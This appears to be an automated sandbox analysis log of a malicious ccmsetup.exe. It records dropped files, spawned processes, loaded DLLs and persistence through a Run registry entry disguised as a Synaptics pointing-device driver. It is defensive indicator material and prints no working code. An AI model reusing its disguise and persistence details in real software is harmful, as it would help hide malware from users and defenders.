                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\aOkCiDht.xlsmJump to behavior
                              Source: Yara matchFile source: ccmsetup.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.ccmsetup.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXD7AF.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\ccmsetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: ccmsetup.exeReversingLabs: Detection: 92%
                              Source: ._cache_ccmsetup.exeString found in binary or memory: <Additional>%s</Additional>
                              Source: ._cache_ccmsetup.exeString found in binary or memory: Item '%s' is detected but needs repair/install. Add it to the list.
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile read: C:\Users\user\Desktop\ccmsetup.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\ccmsetup.exe "C:\Users\user\Desktop\ccmsetup.exe"
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess created: C:\Users\user\Desktop\._cache_ccmsetup.exe "C:\Users\user\Desktop\._cache_ccmsetup.exe"
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11516
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11544
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 1912
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 4528
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11368
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11488
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess created: C:\Users\user\Desktop\._cache_ccmsetup.exe "C:\Users\user\Desktop\._cache_ccmsetup.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: acgenral.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: acgenral.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: activeds.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: logoncli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: acgenral.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\iaSUNtv.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: ccmsetup.exeStatic file information: File size 4873728 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: ccmsetup.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x3fb600
                              Source: Binary string: X:\bt\1024777\repo\out\retail-x86\ccmsetup\ccmsetup.pdb source: ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.dr
                              Source: Binary string: X:\bt\1024777\repo\out\retail-x86\ccmsetup\ccmsetup.pdb} source: ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.dr
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005B4BBD __EH_prolog3_catch_GS,LoadLibraryW,GetProcAddress,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CoTaskMemFree,2_2_005B4BBD
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005D2223 push ecx; ret 2_2_005D2236
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005A83F3 push ss; retn 0002h2_2_005A83F7
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005D5235 push ecx; ret 2_2_005D5248
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_00591FB4 push ebp; iretd 2_2_00591FB8
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0073C770 push edx; ret 3_2_0073C771
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0073C367 push 7088007Ch; ret 3_2_0073C371
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0073C758 push edi; ret 3_2_0073C759
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0073C740 push esp; ret 3_2_0073C741
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0073C23C push eax; retn 0073h3_2_0073C255
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0073A100 pushfd ; iretd 3_2_0073A101
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0073C6E0 pushad ; ret 3_2_0073C6E1
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_007327B0 pushad ; iretd 3_2_007327C5
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0073C590 push cs; ret 3_2_0073C591
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_053DCBA0 pushfd ; retf 3_2_053DCBA1
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_053DCB9C pushfd ; retf 3_2_053DCB9D
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_053E9E7E pushad ; iretd 3_2_053E9FC9
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB558E push ebp; retf 3_2_09CB5596
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB5580 push ebp; retf 3_2_09CB5582
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB5598 push ebp; retf 3_2_09CB559E
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB91AC push 939C76FAh; retf 3_2_09CB91B2
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB55A3 push ebp; retf 3_2_09CB55B2
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB55BF push ebp; retf 3_2_09CB55C2
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB55B4 push ebp; retf 3_2_09CB55BA
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB154C push ss; retf 3_2_09CB1552
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB6D4C push 6F3C76FAh; retf 3_2_09CB6D52
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB1543 push ss; retf 3_2_09CB154A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB5565 push ebp; retf 3_2_09CB5576
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB5565 push ebp; retf 3_2_09CB558A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB111B push ss; retf 3_2_09CB1126
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB48EC push 4ADC76FAh; retf 3_2_09CB48F2
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB30FB push ss; retf 3_2_09CB30FE

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile created: C:\Users\user\Desktop\._cache_ccmsetup.exeJump to dropped file
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile created: C:\ProgramData\Synaptics\RCXD7AF.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile created: C:\ProgramData\Synaptics\RCXD7AF.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeFile created: C:\Windows\ccmsetup\Logs\ccmsetup.logJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0059892F __EH_prolog3_catch_GS,OpenSCManagerW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CreateServiceW,GetLastError,GetCurrentThreadId,StartServiceW,GetLastError,GetCurrentThreadId,OpenServiceW,GetLastError,GetCurrentThreadId,QueryServiceStatus,Sleep,DeleteService,GetLastError,CloseServiceHandle,Sleep,OpenServiceW,GetLastError,ControlService,Sleep,GetCurrentThreadId,CloseServiceHandle,CloseServiceHandle,2_2_0059892F
                              Source: C:\Users\user\Desktop\ccmsetup.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
